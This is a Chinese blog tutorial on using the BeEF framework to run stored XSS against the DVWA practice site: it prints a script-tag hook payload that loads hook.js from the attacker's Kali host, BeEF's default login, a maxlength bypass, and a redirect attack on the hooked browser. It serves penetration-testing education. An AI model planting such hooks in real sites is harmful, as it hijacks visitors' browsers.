web安全中使用beef工具自动化xss攻击流程

最新推荐文章于 2024-05-09 16:26:31 发布
最新推荐文章于 2024-05-09 16:26:31 发布
阅读量623 收藏 3
点赞数 1
分类专栏: web安全 文章标签: web安全 自动化 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63539335/article/details/128805409
版权

自动化xss攻击

一. 在kali中输入beef-xss

在这里插入图片描述

主要看这里
在这里插入图片描述

用于登录Beef
Web UI: http://127.0.0.1:3000/ui/panel(127.0.0.1要换为kali的ip)
钩子代码
Hook: <script src="http://<IP>:3000/hook.js"></script>
例子
Example: <script src="http://127.0.0.1:3000/hook.js"></script>
IP要换为kali的IP

在kali中输入ip a 查看kali的ip为192.168.85.128
在这里插入图片描述

二.登录beef

http://192.168.85.128:3000/ui/panel

在这里插入图片描述

用户名为:beef
密码为:beef
注:如果密码不对可以在kali中查看密码
以root身份打开文件系统,找到/etc/beef-xss/config.yaml
在这里插入图片描述

这样便可以查看或修改密码了
在这里插入图片描述

三.布置hook

进入到dvwa靶机中
注:靶机中的输入框有字符限制,为了能够将代码完整输入所以我们需要改变限制
1.按F12或单击鼠标右键点击检查
在这里插入图片描述

2.点击选择器(查看器右边),选择message输入框
在这里插入图片描述

3.在查看器中修改maxlength
在这里插入图片描述

4.输入以下代码(这里的IP为kali的IP)

<script src="http://192.168.85.128:3000/hook.js"></script>

在这里插入图片描述
注:提交代码后,访问该页面的主机就会中招,这里也包括刚刚提交代码的这个主机

四.在beef中可查看上钩的受害机,并可进行对受害机的一系列攻击

这个就是刚刚提交hook代码的主机
在这里插入图片描述
我这里再演示一下使用其他主机访问该页面的情况(这里我使用的是kali主机访问该页面的效果)

在这里插入图片描述
只要点击Xss stored就已经中招,可在beef中查看该主机
在这里插入图片描述

我再演示一下控制后的攻击方式
在这里插入图片描述
1.将ip改为受害机的ip(我选择的事kali这台机器作为攻击目标,所以为kali的ip)
2.将想让其访问的网址写到Redirct URL中(我写的淘宝网址)
在这里插入图片描述
攻击效果(原本的dvwa页面变为淘宝页面)当然控制后不局限于这一种攻击,在beef中还有很多的攻击方式,大家可以自己试一试,每一个攻击都有注释的
在这里插入图片描述

Dimples °717
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
利用 BeEF 执行 XSS 攻击的总结
weixin_71139244的博客
05-27 1028
跨站脚本攻击,简称XSS,是一种网站应用程序的安全漏洞攻击,属于代码注入的一种;与其他攻击相比,XSS攻击所带来的危害更大。跨站脚本攻击XSS,是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面,当正常用户访问该页面时,则可导致嵌入的恶意脚本代码的执行,从而达到恶意攻击用户的目的。
跨站脚本攻击xss利用-beef攻击-演示
jklbnm12的博客
02-09 1013
0x0环境 主机A win10:10.51.20.60(wifi) 主机A的虚拟机kali(攻击者):192.168.110.129(NAT) 主机A的虚拟机win2003(受害者):192.168.110.132(NAT) 0x1 配置 0x11 beef配置 Beef的配置文件在 /usr/share/beef-xss/config.yaml Host:kali IP Port:beef监听端口默认3000 public:主机A(接入外网的电脑IP) public_port:主机A空闲的端口,我
XSS跨站脚本攻击
weixin_68057794的博客
08-08 871
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。从上面的一段话,可以得知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。...
网络安全最全Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip(3),2024春招面试
最新发布
2401_84302816的博客
05-09 624
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
XSS漏洞利用工具BeEF
RockHan
11-06 547
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
红队快速攻击全自动化工具
weixin_46211944的博客
03-08 171
JuD是一款自动化扫描器,其功能主要是遍历所有子域名、及遍历主机所有端口寻找出所有http服务,并使用集成的工具进行扫描,最后集成扫描报告;工具目前有:oneforall、masscan、nmap、Wafw00f、rad、xray、ServerChan等。扫描时发现漏洞Server酱会发送提醒到WeChat。遍历结束后,Server酱会发送提醒到WeChat。使用nmap扫描开放端口;使用masscan遍历主机所有开放端口。扫描到的URL传递到Xray。若无WAF,传递到rad。使用Xray进行被动扫描。
Web应用安全XSS通过JavaScript攻击(实验).docx
06-20
(附加题)使用beef尝试更多XSS JavaScript功能。 三、实验内容与步骤 在Kali上安装beef-xss工具: 1.1、首先打开Kali,将kali的下载源换成国内科大的源,在root权限下输入命令:vim /etc/apt/sources.list打开apt...
Web应用安全XSS篡改页面(实验).docx
06-19
在本实验,我们将使用beef-xss工具来模拟XSS攻击beef-xss是一个开源的XSS攻击框架,能够模拟各种XSS攻击场景。我们将使用beef-xss工具来攻击pikachu站点,模拟用户登录pikachu站点,然后在beef-xss平台上控制...
kali-beef攻击浏览器-运维安全详细笔记总结
06-30
kali-beef攻击浏览器-运维安全详细笔记总结
BeefAuto:无需配置路由器即可自动化 Beef 以通过广域网使用
07-24
python脚本自动化牛肉并通过使用ngrok打开端口将其配置为使用overwan 截图 安装 [ 卡利 ] git 克隆 cd BeefAuto 须藤 pip3 install -r requirements.txt 须藤 bash install.sh 须藤 python3 main.py 经过以下...
工具使用 _ BeEF使用1
08-03
工具使用 _ BeEF使用1
扫描sql注入与xss攻击的牛b工具
11-02
扫描sql注射与xss攻击的牛b工具,适合新手初入渗透测试使用工具,很好有效辅助你们对网站的渗透测试。
多线程自动化syn&udp flood攻击集成工具
12-31
http://download.csdn.net/detail/wuchunlai_2012/9372564 http://download.csdn.net/detail/wuchunlai_2012/9373247 这是我针对以前发出的两个工具做的一些优化和集成,增加了自动识别网卡mac等功能,优化了攻击时间的控制策略。如果大家只是学习用,建议下载以上的代码进行修改和自己编写。 备注:代码自己学习测试用得,有恶意攻击行为的后果自负 之后将发布集成cc攻击的3.0版本
xss攻击进阶篇---如何利用抓包工具Fiddler进行xss攻击
前端小工
11-12 1万+
最近对自己的项目进行了xss攻击,想找到还存在什么漏洞;玩着玩着玩上瘾了,顺手帮别人的网站做了测试,结果时,不费一兵一卒就轻易拿下;还可以进行CSRF攻击,攻击别人的帐号.xss的危害可小可大;比如弄一些恶作剧,弹出一些东西,大到恶意地操作别的帐号,做一下钓鱼的入口等等 什么是xss,什么csrf;在这里我们不去讨论;相关的知识点请看之前我写过的一篇文章XSS跨站脚本攻击与CSRF跨站请求伪造攻击的
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1138
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
XSSOR:智能XSS工具箱,助力Web安全研究
gitblog_00086的博客
04-18 372
XSSOR:智能XSS工具箱,助力Web安全研究 项目地址:https://gitcode.com/evilcos/xssor 简介 XSSOR 是一个强大的跨平台XSS(Cross Site Scripting)攻击与防御测试工具集。它由著名的安全研究员Evilcos开发,旨在帮助Web开发者、安全研究人员和渗透测试人员更好地理解和处理XSS漏洞,提升网站的安全性。 技术分析 XSSOR的核心...
XSS漏洞(综合练习)——渗透day09
qq_62716256的博客
09-06 655
XSS漏洞(综合练习)——day09x
浏览器攻击框架BeEF Part 5:攻击Web应用与攻击网络
Fly_鹏程万里
08-24 967
前言 上一章介绍了Tunneling Proxy技术以及怎样使用这项技术来绕过httponly实现高级的会话窃取。本章探讨如何在不违反SOP情况下,通过勾连浏览器攻击Web应用与攻击网络。其有一些攻击技术就用到了Tunneling Proxy的技术。 攻击网络 攻击Web应用有一些技术需要使用到攻击网络的技术,所以就先介绍攻击网络。这里的攻击网络一般是指攻击内网。想象一下这样的场景:当一个...
XSS攻击常识及常见的XSS攻击脚本汇总
热门推荐
qw_xingzhe的专栏
06-16 7万+
一、什么是XSS?XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程,出现了不被预期的脚本指令并执行时,XSS就发生了。这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。二、XSS有什么危害?当我们知道了什么是XSS后,也一定很想知道它到底有什么用,或者有什么危害,如何防御。关于XSS有关危害,我这里罗列...
xss攻击 beef
09-06
使用beef-xss进行XSS攻击需要在Kali上安装beef-xss工具,并输入"beef-xss"命令来获取恶意代码。如果没有安装beef,需要先进行安装,并按照提示一直输入"y"进行安装。 在进行XSS攻击之前,建议先了解XSS的基本知识和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值